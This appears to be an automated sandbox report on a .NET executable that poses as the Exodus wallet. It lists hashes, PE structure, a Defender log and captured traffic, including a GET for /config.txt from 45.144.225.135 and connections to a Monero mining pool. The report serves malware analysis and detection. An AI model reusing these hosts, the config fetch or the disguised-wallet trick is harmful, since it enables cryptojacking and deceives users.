                                                                                                                                        SSDEEP:12:58KRBubdpkoF1AG3rlsYLVIDk9+MlWlLehB4yAq7ejCEsYLVIO:OaqdmuF3rl9d+kWReH4yJ7MN9H
                                                                                                                                        MD5:D3DD590B4944060970ACE29E564EEA27
                                                                                                                                        SHA1:A716EACE283B105F36D76F23208714738AC47D8D
                                                                                                                                        SHA-256:7DE2EB030E51A0FC4F96F9C751DBCEA3BFC2770DE398598C073350A96645B8B6
                                                                                                                                        SHA-512:CEEC4B3A251D203E6745AB7114A237A2549378CA014BDC79EBF9A1E91DEB73E3ECA94F172E36E95F8E5CEABB3B366ACCE26A10CAC6D3E03B298AA65C4BB5AD78
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. J.u.l. .. 1.4. .. 2.0.2.1. .0.7.:.0.5.:.4.1.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. W.e.d. .. J.u.l. .. 1.4. .. 2.0.2.1. .0.7.:.0.5.:.4.1.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                                                                        Static File Info

                                                                                                                                        General

                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Entropy (8bit):7.994950828794957
                                                                                                                                        TrID:
                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                        File name:P7Oa6i5muL.exe
                                                                                                                                        File size:2241536
                                                                                                                                        MD5:9dbcf183762872d8917b8a19535a0c65
                                                                                                                                        SHA1:94d27127f8ffbebec6ad803599ed3c0477a15e3c
                                                                                                                                        SHA256:759d3e20098353e73c0c417ecf755a3ab24cdf7ead10df8c5a4aab549d7423f2
                                                                                                                                        SHA512:cd3fb751c0360df6865633d72633403c0802153727fe75951e842227b4237970df999229c73d1e94d9e0f0b0442ec58ec59024836ebef3f7605254bc6a4f82b6
                                                                                                                                        SSDEEP:49152:7wFpwLN5DX5ecu7O4jrimxMHDUrY+BPOIz8uJxLWuXoK:8wLf8qHa1eunvXoK
                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....BT...............0... .........F. .. .... ...@.. ........................"...........@................................

                                                                                                                                        File Icon

                                                                                                                                        Icon Hash:d46df4696cecedd2

                                                                                                                                        Static PE Info

                                                                                                                                        General

                                                                                                                                        Entrypoint:0x60a646
                                                                                                                                        Entrypoint Section:.text
                                                                                                                                        Digitally signed:false
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        Subsystem:windows gui
                                                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                        Time Stamp:0x91544293 [Sun Apr 7 02:53:07 2047 UTC]
                                                                                                                                        TLS Callbacks:
                                                                                                                                        CLR (.Net) Version:v4.0.30319
                                                                                                                                        OS Version Major:4
                                                                                                                                        OS Version Minor:0
                                                                                                                                        File Version Major:4
                                                                                                                                        File Version Minor:0
                                                                                                                                        Subsystem Version Major:4
                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                        Entrypoint Preview

                                                                                                                                        Instruction
                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al

                                                                                                                                        Data Directories

                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x20a5f40x4f.text
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x20c0000x1a800.rsrc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2280000xc.reloc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x20a5d80x1c.text
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                        Sections

                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                        .text0x20000x20864c0x208800unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                        .rsrc0x20c0000x1a8000x1a800False0.81779739092data7.59703560029IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                        .reloc0x2280000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                        Resources

                                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                                        RT_ICON0x20c2400x128GLS_BINARY_LSB_FIRST
                                                                                                                                        RT_ICON0x20c3780x2e8data
                                                                                                                                        RT_ICON0x20c6700x668dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
                                                                                                                                        RT_ICON0x20cce80x568GLS_BINARY_LSB_FIRST
                                                                                                                                        RT_ICON0x20d2600x8a8data
                                                                                                                                        RT_ICON0x20db180xea8data
                                                                                                                                        RT_ICON0x20e9d00x468GLS_BINARY_LSB_FIRST
                                                                                                                                        RT_ICON0x20ee480x10a8data
                                                                                                                                        RT_ICON0x20ff000x25a8data
                                                                                                                                        RT_ICON0x2124b80x6029PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                                        RT_ICON0x2184f40xdcccPNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                        RT_GROUP_ICON0x2261d00xa0data
                                                                                                                                        RT_VERSION0x2262800x37edata
                                                                                                                                        RT_MANIFEST0x2266100x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                                                        Imports

                                                                                                                                        DLLImport
                                                                                                                                        mscoree.dll_CorExeMain

                                                                                                                                        Version Infos

                                                                                                                                        DescriptionData
                                                                                                                                        Translation0x0000 0x04b0
                                                                                                                                        LegalCopyrightCopyright (c) 2015-2021 Exodus Movement, Inc.
                                                                                                                                        Assembly Version21.7.2.0
                                                                                                                                        InternalNamenotepad.exe
                                                                                                                                        FileVersion21.7.2.0
                                                                                                                                        CompanyNameExodus Movement Inc
                                                                                                                                        LegalTrademarks
                                                                                                                                        CommentsExodus
                                                                                                                                        ProductNameExodus
                                                                                                                                        ProductVersion21.7.2.0
                                                                                                                                        FileDescriptionExodus
                                                                                                                                        OriginalFilenamenotepad.exe

                                                                                                                                        Network Behavior

                                                                                                                                        Network Port Distribution

                                                                                                                                        TCP Packets

                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Jul 14, 2021 07:04:11.334321976 CEST4971980192.168.2.345.144.225.135
                                                                                                                                        Jul 14, 2021 07:04:11.362827063 CEST804971945.144.225.135192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:11.363018990 CEST4971980192.168.2.345.144.225.135
                                                                                                                                        Jul 14, 2021 07:04:11.363482952 CEST4971980192.168.2.345.144.225.135
                                                                                                                                        Jul 14, 2021 07:04:11.392014027 CEST804971945.144.225.135192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:11.392051935 CEST804971945.144.225.135192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:11.392072916 CEST804971945.144.225.135192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:11.392119884 CEST4971980192.168.2.345.144.225.135
                                                                                                                                        Jul 14, 2021 07:04:11.392133951 CEST4971980192.168.2.345.144.225.135
                                                                                                                                        Jul 14, 2021 07:04:12.629949093 CEST4972114444192.168.2.3144.217.14.139
                                                                                                                                        Jul 14, 2021 07:04:12.742824078 CEST1444449721144.217.14.139192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:12.743212938 CEST4972114444192.168.2.3144.217.14.139
                                                                                                                                        Jul 14, 2021 07:04:12.743839979 CEST4972114444192.168.2.3144.217.14.139
                                                                                                                                        Jul 14, 2021 07:04:12.855171919 CEST1444449721144.217.14.139192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:13.030257940 CEST1444449721144.217.14.139192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:13.083268881 CEST4972114444192.168.2.3144.217.14.139
                                                                                                                                        Jul 14, 2021 07:04:16.396761894 CEST804971945.144.225.135192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:16.396883011 CEST4971980192.168.2.345.144.225.135
                                                                                                                                        Jul 14, 2021 07:04:48.866415024 CEST1444449721144.217.14.139192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:49.037607908 CEST4972114444192.168.2.3144.217.14.139
                                                                                                                                        Jul 14, 2021 07:04:56.145824909 CEST1444449721144.217.14.139192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:56.225605011 CEST4972114444192.168.2.3144.217.14.139
                                                                                                                                        Jul 14, 2021 07:05:56.710599899 CEST1444449721144.217.14.139192.168.2.3
                                                                                                                                        Jul 14, 2021 07:05:56.840178013 CEST4972114444192.168.2.3144.217.14.139
                                                                                                                                        Jul 14, 2021 07:05:58.707011938 CEST4972114444192.168.2.3144.217.14.139
                                                                                                                                        Jul 14, 2021 07:06:01.310838938 CEST4971980192.168.2.345.144.225.135
                                                                                                                                        Jul 14, 2021 07:06:01.716926098 CEST4971980192.168.2.345.144.225.135
                                                                                                                                        Jul 14, 2021 07:06:02.418819904 CEST4971980192.168.2.345.144.225.135
                                                                                                                                        Jul 14, 2021 07:06:03.715773106 CEST4971980192.168.2.345.144.225.135
                                                                                                                                        Jul 14, 2021 07:06:06.216115952 CEST4971980192.168.2.345.144.225.135
                                                                                                                                        Jul 14, 2021 07:06:11.107098103 CEST4971980192.168.2.345.144.225.135

                                                                                                                                        UDP Packets

                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Jul 14, 2021 07:03:45.599698067 CEST5128153192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:03:45.615533113 CEST53512818.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:03:46.203552961 CEST4919953192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:03:46.217386961 CEST53491998.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:03:46.939202070 CEST5062053192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:03:46.952008009 CEST53506208.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:03:47.717214108 CEST6493853192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:03:47.729578018 CEST53649388.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:03:48.123855114 CEST6015253192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:03:48.144217968 CEST53601528.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:03:48.621572971 CEST5754453192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:03:48.634825945 CEST53575448.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:03:49.408323050 CEST5598453192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:03:49.421190977 CEST53559848.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:03:50.480515957 CEST6418553192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:03:50.493535995 CEST53641858.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:03:51.395421982 CEST6511053192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:03:51.410017967 CEST53651108.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:03:52.400088072 CEST5836153192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:03:52.412940979 CEST53583618.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:03:53.408324003 CEST6349253192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:03:53.421097040 CEST53634928.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:03:54.881628036 CEST6083153192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:03:54.895257950 CEST53608318.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:03:56.013209105 CEST6010053192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:03:56.026211977 CEST53601008.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:03:56.800204992 CEST5319553192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:03:56.813143015 CEST53531958.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:03:58.810767889 CEST5014153192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:03:58.823700905 CEST53501418.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:03:59.669223070 CEST5302353192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:03:59.682320118 CEST53530238.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:00.864523888 CEST4956353192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:04:00.878118038 CEST53495638.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:09.139568090 CEST5135253192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:04:09.154616117 CEST53513528.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:11.089646101 CEST5934953192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:04:11.102499008 CEST53593498.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:12.063724041 CEST5708453192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:04:12.078748941 CEST53570848.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:12.599672079 CEST5882353192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:04:12.621329069 CEST53588238.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:21.355102062 CEST5756853192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:04:21.381994009 CEST53575688.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:28.174298048 CEST5054053192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:04:28.193172932 CEST53505408.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:53.476847887 CEST5436653192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:04:53.586257935 CEST53543668.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:54.409327984 CEST5303453192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:04:54.608023882 CEST53530348.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:55.113377094 CEST5776253192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:04:55.127599955 CEST53577628.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:55.461149931 CEST5543553192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:04:55.582252979 CEST53554358.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:55.999085903 CEST5071353192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:04:56.012989998 CEST53507138.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:56.626780033 CEST5613253192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:04:56.641124964 CEST53561328.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:57.149454117 CEST5898753192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:04:57.163265944 CEST53589878.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:57.942661047 CEST5657953192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:04:57.955780983 CEST53565798.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:58.918448925 CEST6063353192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:04:58.933700085 CEST53606338.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:04:59.520582914 CEST6129253192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:04:59.535106897 CEST53612928.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:05:54.282412052 CEST6361953192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:05:54.309309959 CEST53636198.8.8.8192.168.2.3
                                                                                                                                        Jul 14, 2021 07:06:01.634870052 CEST6493853192.168.2.38.8.8.8
                                                                                                                                        Jul 14, 2021 07:06:01.656538963 CEST53649388.8.8.8192.168.2.3

                                                                                                                                        DNS Queries

                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                        Jul 14, 2021 07:04:12.599672079 CEST192.168.2.38.8.8.80xeceaStandard query (0)xmr-us-east1.nanopool.orgA (IP address)IN (0x0001)
                                                                                                                                        Jul 14, 2021 07:06:01.634870052 CEST192.168.2.38.8.8.80x5a8eStandard query (0)xmr-us-east1.nanopool.orgA (IP address)IN (0x0001)

                                                                                                                                        DNS Answers

                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                        Jul 14, 2021 07:04:12.621329069 CEST8.8.8.8192.168.2.30xeceaNo error (0)xmr-us-east1.nanopool.org142.44.242.100A (IP address)IN (0x0001)
                                                                                                                                        Jul 14, 2021 07:04:12.621329069 CEST8.8.8.8192.168.2.30xeceaNo error (0)xmr-us-east1.nanopool.org142.44.243.6A (IP address)IN (0x0001)
                                                                                                                                        Jul 14, 2021 07:04:12.621329069 CEST8.8.8.8192.168.2.30xeceaNo error (0)xmr-us-east1.nanopool.org144.217.14.109A (IP address)IN (0x0001)
                                                                                                                                        Jul 14, 2021 07:04:12.621329069 CEST8.8.8.8192.168.2.30xeceaNo error (0)xmr-us-east1.nanopool.org192.99.69.170A (IP address)IN (0x0001)
                                                                                                                                        Jul 14, 2021 07:04:12.621329069 CEST8.8.8.8192.168.2.30xeceaNo error (0)xmr-us-east1.nanopool.org144.217.14.139A (IP address)IN (0x0001)
                                                                                                                                        Jul 14, 2021 07:06:01.656538963 CEST8.8.8.8192.168.2.30x5a8eNo error (0)xmr-us-east1.nanopool.org144.217.14.109A (IP address)IN (0x0001)
                                                                                                                                        Jul 14, 2021 07:06:01.656538963 CEST8.8.8.8192.168.2.30x5a8eNo error (0)xmr-us-east1.nanopool.org144.217.14.139A (IP address)IN (0x0001)
                                                                                                                                        Jul 14, 2021 07:06:01.656538963 CEST8.8.8.8192.168.2.30x5a8eNo error (0)xmr-us-east1.nanopool.org142.44.243.6A (IP address)IN (0x0001)
                                                                                                                                        Jul 14, 2021 07:06:01.656538963 CEST8.8.8.8192.168.2.30x5a8eNo error (0)xmr-us-east1.nanopool.org192.99.69.170A (IP address)IN (0x0001)
                                                                                                                                        Jul 14, 2021 07:06:01.656538963 CEST8.8.8.8192.168.2.30x5a8eNo error (0)xmr-us-east1.nanopool.org142.44.242.100A (IP address)IN (0x0001)

                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                        • 45.144.225.135

                                                                                                                                        HTTP Packets

                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        0192.168.2.34971945.144.225.13580C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Jul 14, 2021 07:04:11.363482952 CEST1403OUTGET /config.txt HTTP/1.1
                                                                                                                                        Accept: text/*, application/exe, application/zlib, application/gzip, application/applefile
                                                                                                                                        User-Agent: WinInetGet/0.1
                                                                                                                                        Host: 45.144.225.135
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Jul 14, 2021 07:04:11.392051935 CEST1405INHTTP/1.1 200 OK
                                                                                                                                        Date: Wed, 14 Jul 2021 05:04:11 GMT
                                                                                                                                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                                                        Last-Modified: Tue, 13 Jul 2021 21:08:29 GMT
                                                                                                                                        ETag: "776-5c707a3b80d40"
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Content-Length: 1910
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Content-Type: text/plain; charset=UTF-8
